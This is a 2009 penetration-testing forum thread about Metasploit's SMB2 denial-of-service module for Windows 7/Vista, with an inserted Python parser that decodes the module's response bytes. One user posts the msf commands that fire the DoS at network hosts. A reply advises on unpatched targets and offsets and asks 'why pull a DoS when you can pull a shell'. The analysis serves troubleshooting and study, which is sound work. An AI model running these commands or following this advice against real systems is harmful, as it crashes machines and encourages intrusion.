Remote Exploit Forums

Pentesting: Specific topics related to legal penetration testing

#1
09-12-2009, 12:05 PM
Junior Member
 
Join Date: Jun 2007
Posts: 9
Metasploit latest video: smb2_negotiate_pidhigh, Windows 7 (DoS) - 4 X Security Team

Exploit code for a remote reboot flaw in Microsoft’s implementation of the SMB2 protocol has been posted on the internet, exposing users of Windows 7 and Windows Vista to the teardrop attacks that used to be popular on Windows 3.1 and Windows 95.

Home Page:

4xsecurityteam(dot)blogspot(dot)com

4xunderground(dot)blogspot(dot)com

vimeo.com/channels/4xsecurityteam

thak&
#2
10-28-2009, 10:53 PM
New Member
 
Join Date: Oct 2009
Posts: 1

Hi guys, I have a question. I'm testing this auxiliary, but it isn't working for me: my machine doesn't reboot, and the console just shows this. I didn't try it on just one of my machines, I tested it on 3, and this is what happens:

Targeting host 192.168.1.6:445...
[-] Auxiliary failed: Rex::ConnectionTimeout The connection timed out (192.168.1.6:445).
Sending request and waiting for a reply...
msf > use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 192.168.1.3
RHOST => 192.168.1.3
msf auxiliary(smb2_negotiate_pidhigh) > set RPORT 445
RPORT => 445
msf auxiliary(smb2_negotiate_pidhigh) > run
[*] Response received: "\x00\x00\x00\x9E\xFESMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00\x01\x00\x02\x02\x00\x00\x8Dm\x8E\xEEc#}B\xA3b\x1D\x03\xB4\xC4%\x99\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x8B\x06_\xC6\rX\xCA\x01\xFBX+[\xAEW\xCA\x01\x80\x00\x1E\x00 LM `\x1C\x06\x06+\x06\x01\x05\x05\x02\xA0\x120\x10\xA0\x0E0\f\x06\n+\x06\x01\x04\x01\x827\x02\x02\n"
[*] Auxiliary module execution completed

Could anybody give me an idea of what's going on?

Hi guys, I see that there's no thread about this particular question. I tried to execute and run the auxiliary smb2_negotiate_pidhigh on my other 3 computers in my network, but it doesn't execute, because my machines don't reboot. The ports that are supposed to be open are open, and what I pasted is what happens.

I hope someone has an idea of what's going on.

Last edited by archangel.amael; 10-28-2009 at 11:20 PM. Reason: Double Post
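The "Response received" string in the post above is a complete SMB2 NEGOTIATE response, and it carries more than the module prints. What follows is an added example for this thread, not code from the Metasploit module or from anyone posting here: a small Python parser for that response, with the bytes from the post reassembled field by field as its sample input (the forum inserted a space into the long string every 50 characters; those are removed). The field layout follows MS-SMB2 (the SMB2 header and the NEGOTIATE response); the DER walker that lists the SPNEGO mechanisms, the DIALECTS and MECHS lookup tables and the `is_wellformed` helper are this example's own, not part of the module.

```python
"""Decode the SMB2 NEGOTIATE response that smb2_negotiate_pidhigh prints."""
import struct
import uuid
from datetime import datetime, timedelta, timezone

# Sample input: the "Response received" bytes from the post, reassembled field
# by field (constructed here from the text of the post, not captured live).
SAMPLE = (
    b"\x00\x00\x00\x9E"                          # NetBIOS session header: 158 bytes follow
    + b"\xFESMB"                                 # SMB2 ProtocolId
    + b"\x40\x00"                                # StructureSize = 64
    + b"\x00\x00" + b"\x00\x00\x00\x00"          # CreditCharge, Status = STATUS_SUCCESS
    + b"\x00\x00" + b"\x01\x00"                  # Command = 0 (NEGOTIATE), CreditResponse = 1
    + b"\x01\x00\x00\x00"                        # Flags = SMB2_FLAGS_SERVER_TO_REDIR
    + b"\x00" * 44                               # NextCommand, MessageId, Reserved, TreeId, SessionId, Signature
    + b"A\x00"                                   # NEGOTIATE response StructureSize = 65
    + b"\x01\x00" + b"\x02\x02" + b"\x00\x00"    # SecurityMode, DialectRevision = 0x0202, Reserved
    + b"\x8Dm\x8E\xEEc#}B\xA3b\x1D\x03\xB4\xC4%\x99"  # ServerGuid
    + b"\x01\x00\x00\x00"                        # Capabilities = SMB2_GLOBAL_CAP_DFS
    + b"\x00\x00\x01\x00" * 3                    # MaxTransactSize, MaxReadSize, MaxWriteSize = 65536
    + b"\x8B\x06_\xC6\rX\xCA\x01"                # SystemTime (FILETIME)
    + b"\xFBX+[\xAEW\xCA\x01"                    # ServerStartTime (FILETIME)
    + b"\x80\x00" + b"\x1E\x00"                  # SecurityBufferOffset = 128, SecurityBufferLength = 30
    + b" LM "                                    # Reserved2, exactly as the post shows it
    + b"`\x1C\x06\x06+\x06\x01\x05\x05\x02\xA0\x120\x10\xA0\x0E0\f\x06\n"
    + b"+\x06\x01\x04\x01\x827\x02\x02\n"        # SPNEGO NegTokenInit, 30 bytes
)

SMB2_MAGIC = b"\xFESMB"
DIALECTS = {0x0202: "SMB 2.0.2", 0x0210: "SMB 2.1"}          # example's own lookup table
MECHS = {                                                     # example's own lookup table
    "1.3.6.1.5.5.2": "SPNEGO",
    "1.3.6.1.4.1.311.2.2.10": "NTLMSSP",
    "1.2.840.48018.1.2.2": "MS KRB5",
    "1.2.840.113554.1.2.2": "KRB5",
}
_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return _EPOCH_1601 + timedelta(microseconds=ft // 10)


def _der_len(buf, i):
    """Decode a DER length at buf[i]; return (length, offset of the value)."""
    first = buf[i]
    if first < 0x80:
        return first, i + 1
    n = first & 0x7F
    return int.from_bytes(buf[i + 1:i + 1 + n], "big"), i + 1 + n


def _decode_oid(body):
    arcs = [body[0] // 40, body[0] % 40]
    val = 0
    for b in body[1:]:               # base-128 arcs, high bit set on all but the last octet
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(str(a) for a in arcs)


def der_oids(buf):
    """Every OBJECT IDENTIFIER in a DER blob, in order, descending into constructed types."""
    oids, i = [], 0
    while i < len(buf):
        if i + 1 >= len(buf):
            raise ValueError("truncated DER element at offset %d" % i)
        tag = buf[i]
        length, start = _der_len(buf, i + 1)
        body = buf[start:start + length]
        if len(body) != length:
            raise ValueError("truncated DER element at offset %d" % i)
        if tag == 0x06:
            oids.append(_decode_oid(body))
        elif tag & 0x20:             # constructed: SEQUENCE, [0], APPLICATION 0, ...
            oids.extend(der_oids(body))
        i = start + length
    return oids


def parse_negotiate_response(data):
    """Fields of a NetBIOS-framed SMB2 NEGOTIATE response as a dict; ValueError on bad framing."""
    if len(data) < 4 + 128:
        raise ValueError("only %d bytes: too short for header plus NEGOTIATE response" % len(data))
    nb_len = int.from_bytes(data[:4], "big") & 0x00FFFFFF     # low 24 bits carry the length
    pkt = data[4:]
    if nb_len != len(pkt):
        raise ValueError("NetBIOS length says %d bytes, %d present" % (nb_len, len(pkt)))
    if pkt[:4] != SMB2_MAGIC:
        raise ValueError("no \\xFESMB signature: not an SMB2 reply")
    hdr_size, _charge, status, command, credits, flags = struct.unpack_from("<HHIHHI", pkt, 4)
    if hdr_size != 64 or command != 0:
        raise ValueError("not a NEGOTIATE response (StructureSize %d, Command %d)" % (hdr_size, command))
    (body_size, sec_mode, dialect, _r1, guid, caps, max_tx, max_rd, max_wr,
     sys_time, start_time, sec_off, sec_len, _r2) = struct.unpack_from("<HHHH16sIIIIQQHH4s", pkt, 64)
    if body_size != 65:
        raise ValueError("unexpected NEGOTIATE StructureSize %d" % body_size)
    blob = pkt[sec_off:sec_off + sec_len]
    if len(blob) != sec_len:
        raise ValueError("security buffer runs past the end of the packet")
    oids = der_oids(blob)
    return {
        "status": status, "credits_granted": credits, "from_server": bool(flags & 0x1),
        "dialect": dialect, "dialect_name": DIALECTS.get(dialect, "unknown 0x%04x" % dialect),
        "signing_enabled": bool(sec_mode & 0x1), "signing_required": bool(sec_mode & 0x2),
        "server_guid": str(uuid.UUID(bytes_le=guid)), "capabilities": caps,
        "max_transact": max_tx, "max_read": max_rd, "max_write": max_wr,
        "system_time": filetime_to_datetime(sys_time),
        "server_start_time": filetime_to_datetime(start_time),
        "mech_oids": oids, "mech_names": [MECHS.get(o, o) for o in oids],
    }


def is_wellformed(data):
    """True if the bytes parse as a NEGOTIATE response, False if the parser rejects them."""
    try:
        parse_negotiate_response(data)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for key, value in parse_negotiate_response(SAMPLE).items():
        print("%-18s %s" % (key, value))
```

A reply like this only proves that the host answered the negotiate: it is reachable on 445 and speaks SMB2, the dialect in the reply echoes what the client offered rather than identifying the Windows version, and its clock read 2009-10-28, the day of the post. Nothing in it says whether the SMB2 stack on that host is patched. The Rex::ConnectionTimeout for 192.168.1.6 is the opposite case: nothing answered on 445 at all, so that host never saw the request.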
#3
10-28-2009, 11:22 PM
archangel.amael
Moderator
 
Join Date: Nov 2007
Location: behind the wire
Posts: 3,468

Edit your posts using the Edit button located at the bottom right hand side of said post. Re-read the rules that you agreed to when you signed up.
This is your one and only warning.

Furthermore there is no reason to make multiple posts on the same subject.
__________________
The very existence of flame-throwers proves that some time, somewhere, someone said to themselves, You know, I want to set those people over there on fire, but I'm just not close enough to get the job done.
George Carlin
#4
10-31-2009, 03:54 AM
vvpalin
Senior Member
 
Join Date: Apr 2009
Location: all.ur.base
Posts: 417

The post above yours makes my eyes hurt, lol.

It's not enough just to have the port open, btw; you have to be sharing something and it needs to be unpatched.

If you meet both of those conditions you could either try the other DoS, or possibly change the offset.

Regardless, though, why pull a DoS when you can pull a shell?
__________________
Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.
Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.